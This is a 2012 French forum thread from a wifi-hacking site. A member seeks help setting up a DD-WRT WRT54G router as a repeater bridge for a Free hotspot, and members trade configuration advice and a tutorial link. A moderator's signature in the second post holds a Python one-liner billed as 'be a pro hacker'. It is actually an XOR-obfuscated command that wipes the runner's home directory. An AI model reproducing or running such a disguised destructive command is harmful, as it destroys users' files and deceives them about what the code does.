Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-04-2012 18:52:06

maxlamelace
Membre Indétronable
Inscription : 09-01-2010
Messages : 177

Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Salut,

Voila j'ai flashé mon routeur linksys puis créé une connection "repeated bridge" dans le but de capter un hotspot freewifi et de le dispatcher chez moi :

bridge

Le souci c'est qu'ensuite lorsque je prends mon pc en wifi et que j'essaie de me connecter sur le réseau que j'ai créé (jojolapin), il me met Lecture de l'adresse réseau puis fini par m'afficher un "Connectivité limitée ou inexistante"...

J'ai merdé quelque part?


J'ajoute ça si ça peut aider:

details

Merci pour votre aide !

Dernière modification par maxlamelace (06-04-2012 18:54:47)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-04-2012 23:49:35

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Je suis pas expert en répéteurs, mais je te conseille de faire comme moi, et de mettre ton DDWRT en client Wi-Fi et de t'y connecter filairement.
Fonctionnement et gain de bande passante assurée !

Je ne suis pas certain qu'un routeur puisseen même temps répéter un signal et offrir un DHCP. Attends la réponse d'autres membres (:


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 07-04-2012 12:43:24

maxlamelace
Membre Indétronable
Inscription : 09-01-2010
Messages : 177

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Salut Spawn,
Bah justement ce routeur une fois flashé permet bien de capter un signal wifi et de le ré-emettre, c'est le principe du mode repéteur bridge si je ne m'abuse..
Et j'aimerais m'affranchir du cable ethernet en étant full wifi.
Je suis sûr que c'est juste une connerie de rien du tout qui m'échappe là... L'histoire d'un bouton radio pas coché... pour que ça fonctionne...

Hors Ligne

#4 07-04-2012 13:32:01

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Repeater_Bridge.jpg

Jette un coup d'oeil à la wiki DD - WRT
Je n'ai jamais fais la manipulation en question mais déjà je pense que si tu met la même IP que le routeur source que tu ne mets pas le gateway (adresse du routeur source) et le D.N.S. aucune chance que ça marche... wink

Hors Ligne

#5 07-04-2012 13:58:44

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

kcdtv a écrit :

Je n'ai jamais fais la manipulation en question mais déjà je pense que si tu met la même IP que le routeur source que tu ne mets pas le gateway (adresse du routeur source) et le D.N.S. aucune chance que ça marche... wink

Exact !!

Moi j'ai fait cette manipulation, et ca marchait à merveille (laissons de coté le partage de la bande passante..).
J'ajoute, tu peux meme créer jusqu à 4 wifi (type jojolapin, que chacun tu peux le proteger en wep, wpa, ...)

Passons, OUI,, tu dois donner IP pour ton routeur "autre" que celle de ton gateway et DNS (qui sont généralement, les IP de ton freewifi"

Aussi, tu dois, et c'est important, dans le menu "security", décocher, tous les "Additionnels filter" et décocher aussi  "Block WAN Request", et après tu "Disable le SPI Firewal"

Voilà

Hors Ligne

#6 07-04-2012 14:33:25

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Spawn a écrit :

Je ne suis pas certain qu'un routeur puisseen même temps répéter un signal et offrir un DHCP. Attends la réponse d'autres membres (:

Sur ce point Yasmine, doit tu passer par une congiguration à la main des IP sur le routeur en mode "wireless bridge" ou peux tu activer le DHCP?

Hors Ligne

#7 07-04-2012 14:36:05

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

kcdtv a écrit :

Sur ce point Yasmine, doit tu passer par une congiguration à la main des IP sur le routeur en mode "wireless bridge" ou peux tu activer le DHCP?

Tu peux activer le DHCP

Hors Ligne

#8 07-04-2012 19:12:02

maxlamelace
Membre Indétronable
Inscription : 09-01-2010
Messages : 177

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

re smile

Alors grâce au lien vers le wiki j'ai reflashé mon routeur avec le bon firmware ce coup-ci, et demi-victoire!! Demi parce qu'à présent ça fonctionne avec un hotspot Bouygues, mais dès que je bascule sur le freewiffi ça ne marche pas, toujours Connectivité limité.. Etrange ????

Hors Ligne

#9 07-04-2012 21:40:48

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Sur du Bouygues, tu te vois attribuer une IP sur un réseau local en 192.161.2.x ou un truc dans le genre il me semble. Par contre le souci sur du hotspot Free c'est que tu te vois attribuer direct une ip externe (ip publique internet) donc pour caler un wrt en client bridge là dessus à mon avis c'est tendu niveau config...

Hors Ligne

#10 08-04-2012 10:07:44

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

maxlamelace a écrit :

re smile

Alors grâce au lien vers le wiki j'ai reflashé mon routeur avec le bon firmware ce coup-ci, et demi-victoire!! Demi parce qu'à présent ça fonctionne avec un hotspot Bouygues, mais dès que je bascule sur le freewiffi ça ne marche pas, toujours Connectivité limité.. Etrange ????

Comment tu bascules ?
Je pense que ca aurait été intéressant aussi, de dire quelle configuration t a mis ? Ca pourrait intéresser d autres personnes

Hors Ligne

#11 08-04-2012 14:04:43

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

+ 1

Hors Ligne

#12 08-04-2012 17:53:43

maxlamelace
Membre Indétronable
Inscription : 09-01-2010
Messages : 177

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

M1ck3y a écrit :

Sur du Bouygues, tu te vois attribuer une IP sur un réseau local en 192.161.2.x ou un truc dans le genre il me semble. Par contre le souci sur du hotspot Free c'est que tu te vois attribuer direct une ip externe (ip publique internet) donc pour caler un wrt en client bridge là dessus à mon avis c'est tendu niveau config...


ouai bah avec free j'ai rien compris big_smile
Bon ben si tu me dis que c'est pas possible avec free c'est balo j'avais acheté le routeur rien que pour ça...

Yasmine > j'ai suivi le wiki à la lettre c'est tout smile

Hors Ligne

#13 08-04-2012 18:44:45

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

maxlamelace a écrit :

Yasmine > j'ai suivi le wiki à la lettre c'est tout smile

Non, je ne cherche pas à savoir le "comment configurer" (puisque je me débrouille bien pour mes besoins avec le DD-WRT ). Mias peut etre t'aider à trouver tes solutions.
Mais je voulais savoir comment t as fait pour basculer ? As tu eu ton plein internet ? ...

Et puis donner, les parametres de Bouygues et Free que t as mis. Ca pourrait servir ....

Dernière modification par yasmine (08-04-2012 18:53:19)

Hors Ligne

#14 08-04-2012 19:41:19

maxlamelace
Membre Indétronable
Inscription : 09-01-2010
Messages : 177

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

ben j'ai rien mis de spécial justement, une fois le routeur flashé avec le bon firmware, il fait le reste en le mettant en mode repeteur. Tu peux choisir n'importe quel réseau sans faire de modif.
Pour le hotspot bouygues j'ai mis mes identifiants et hop il s'est connecté.
Par contre avec Free impossible d'avoir une connexion.

Dernière modification par maxlamelace (08-04-2012 19:41:52)

Hors Ligne

#15 21-04-2012 19:56:47

maxlamelace
Membre Indétronable
Inscription : 09-01-2010
Messages : 177

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

c'est quand même la loose que free n'autorise pas ce genre de trucs, je les aime bien mais là ils font chier oO

Hors Ligne

#16 22-04-2012 15:11:41

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Le problème n'est pas qu'ils autorisent ou non ce genre de truc, en fait le problème est que sur leurs hotspots ils ont une architecture réseau totalement différente, ils t'attribuent direct une IP publique donc ce qui fonctionne sur un hotspot bouygues ne fonctionnera pas sur un hotspot free. Il te suffit de te connecter de façon classique sur un hotspot free et d'éxaminer l'adresse IP qui t'est attribuée pour comprendre cette subtilité wink

Hors Ligne

#17 01-06-2012 16:55:52

maxlamelace
Membre Indétronable
Inscription : 09-01-2010
Messages : 177

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Yes Mickey c'est exactement le souci, et j'ai finalement résolu le problème. Alors à tout ceux qui galèraient comme moi pour répéter un signal freewifi avec un routeur flashé, pour la méthode c'est par ici c'est cadeau smile

http://admincloud.net/68/repeter-signal … ewifi/112/


merci à Pierre auteur du tuto

Hors Ligne

#18 02-06-2012 00:24:25

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

C'est de la balle ce tuto, merci pour cet excellent lien à garder sous le coude wink

Hors Ligne

#19 12-06-2012 12:10:07

hylyah
N00b
Lieu : Rennes
Inscription : 12-06-2012
Messages : 1
Site Web

Re : Cool j'ai flashé mon WRT54G, aidez-moi à me connecter please [pics]

Le lien exacte est http://admincloud.net/68/repeter-signal … -freewifi/

J'ai encore des bug de lien qui sorte de nul part...

Laissez des commentaires si ca fonctionne chez vous smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]